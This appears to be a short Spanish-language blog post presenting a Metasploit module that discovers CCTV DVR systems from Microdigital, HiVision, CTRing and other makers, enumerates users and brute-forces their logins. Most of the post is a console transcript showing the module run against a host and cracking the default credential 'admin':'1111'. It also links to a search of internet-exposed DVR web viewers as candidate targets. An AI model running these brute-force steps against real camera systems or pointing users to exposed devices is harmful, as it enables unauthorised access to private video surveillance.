![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5GXDmTaRs7BkqFKNi6qnIEeBbJUJTSSlPXCqvEvtxGnbJyAZLPogZx2LrQ_pLtQT9j0pu2Lasxw8b-iJmqjN5F80BmccWXRkm_UTaLcYI-Uh6sMbs-fkELgAWIgqqtpOCch-Q9zUlcbkx/s200/cctv_assasin.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRe5BVjiG2JwnWLHARoPsOaH8kW17mMECybu8dYXUtBYUkMeAvjP69sU7Z3fKPbr3QHWiPmlKzDoSB3S0qH8wRjlQZHtHVRPFbFClilaIMeAGedi5G7f9cnnoW2Hcjn8Su4SMwoKoQzvx/s320/cctv_sample.png)
En este módulo se dirige a sistemas CCTV de Microdigital, HiVision, CTRing y un número importante de otros dispositivos provenientes de estas marcas. Es capaz de descubrir los equipos existentes en la red, determinar los usuarios válidos y excluir los que no lo son y realizar ataques de fuerza bruta para obtener un login válido:
msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit
[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:’admin’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:’user’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: ‘user’
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:’admin’ with password:’admin’
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:’admin’ with password:’1111’
[+] 10.10.1.14:5920 Successful login: ‘admin’ : ‘1111’
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Más detalles técnicos en Gotham Digital Science Blog.
CCTVs: http://eripp.com/?ipdb=1&search=DVR+WebViewer&sort=time&order=DESC&limit=200&submitbutton=Search
muy interesante, los SISTEMAS de seguridad si que han evolucioando
ResponderEliminar